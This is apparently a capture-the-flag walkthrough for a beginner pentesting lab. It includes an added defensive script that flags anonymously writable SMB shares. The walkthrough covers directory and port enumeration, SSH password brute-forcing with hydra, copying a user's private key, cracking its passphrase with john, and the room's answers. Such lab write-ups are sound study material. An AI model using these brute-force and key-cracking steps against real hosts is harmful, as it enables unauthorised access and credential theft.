gobuster
Find hidden directories.
Since http (80) is open anyway, I find them with gobuster.
┌─[user@parrot]─[~]
└──╼ $sudo gobuster dir -u http://10.10.68.199 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.68.199
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 296]
/.hta (Status: 403) [Size: 291]
/.htpasswd (Status: 403) [Size: 296]
/development (Status: 301) [Size: 318] [--> http://10.10.68.199/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 300]
Found it.
-
development
nmap
Fire off a recon scan to find the open ports.
┌─[user@parrot]─[~]
└──╼ $nmap -sV -T4 10.10.68.199
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-19 02:12 UTC
Nmap scan report for 10.10.68.199
Host is up (0.33s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
1090/tcp filtered ff-fms
8009/tcp open ajp13?
8080/tcp open http-proxy
33354/tcp filtered unknown
44176/tcp filtered unknown
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
The SMB server is interesting...
┌─[user@parrot]─[~]
└──╼ $nmap --script smb-enum-shares.nse -p445 10.10.68.199
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-19 02:27 UTC
Nmap scan report for 10.10.68.199
Host is up (0.35s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.68.199\Anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\samba\anonymous
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.68.199\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
|_ Current user access: READ/WRITE
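As an added example (not part of the original writeup), here is a small Python script that parses the smb-enum-shares output above and flags disk shares that grant anonymous write access, the kind of check a defender would run against their own Samba hosts. The SAMPLE text is the scan output from the page, re-indented as nmap prints it.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: the smb-enum-shares block from the scan above,
# embedded here so the script runs offline.
SAMPLE = """\
| smb-enum-shares:
|   account_used: guest
|   \\\\10.10.68.199\\Anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\\samba\\anonymous
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\\10.10.68.199\\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\\tmp
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
"""

# A share header looks like "|   \\host\ShareName:"; fields are "|   Key: value".
SHARE_RE = re.compile(r"^\|_?\s*\\\\[^\\]+\\([^:]+):\s*$")
FIELD_RE = re.compile(r"^\|_?\s*([A-Za-z ]+):\s*(.*)$")

def parse_shares(text: str) -> Dict[str, Dict[str, str]]:
    """Turn the script's indented key/value lines into {share: {field: value}}."""
    shares: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if m:
            current = m.group(1)
            shares[current] = {}
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            shares[current][m.group(1).strip()] = m.group(2).strip()
    return shares

def anonymous_writable(shares: Dict[str, Dict[str, str]]) -> List[str]:
    """Disk shares where unauthenticated users get write access (IPC$ is expected and skipped)."""
    return sorted(
        name for name, fields in shares.items()
        if "WRITE" in fields.get("Anonymous access", "")
        and fields.get("Type") != "STYPE_IPC_HIDDEN"
    )

if __name__ == "__main__":
    found = parse_shares(SAMPLE)
    for name in anonymous_writable(found):
        print(f"FINDING: share {name} ({found[name].get('Path')}) is anonymously writable")
```

Run against a real scan, the same parser can be fed `nmap --script smb-enum-shares` output saved with `-oN`.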
What is the name of the hidden directory on the web server(enter name without /)?
-
anonymous
I found the Anonymous share, so I connect to it.
staff.txt looks suspicious, so I get it and look at its contents.
I found the users Jan and Kay.
I don't know the password, so I brute-force it with hydra.
┌─[✗]─[user@parrot]─[~]
└──╼ $sudo hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.68.199 ssh
[22][ssh] host: 10.10.68.199 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
-
armando
What service do you use to access the server(answer in abbreviation in all caps)?
-
SSH
If you have found another user, what can you do with this information?
-
kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
I send the id_rsa from .ssh to the Parrot machine with scp.
ssh -i id_rsa kay@10.10.xx.xx
I was prompted for a passphrase here, so I crack it with john.
ssh2john id_rsa > text.txt
john text.txt --wordlist=/usr/share/wordlists/rockyou.txt
beeswax
Log in with ssh.
pass.bak looks suspicious, so I look at it.
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
-
heresareallystrongpasswordthatfollowsthepasswordpolicy$$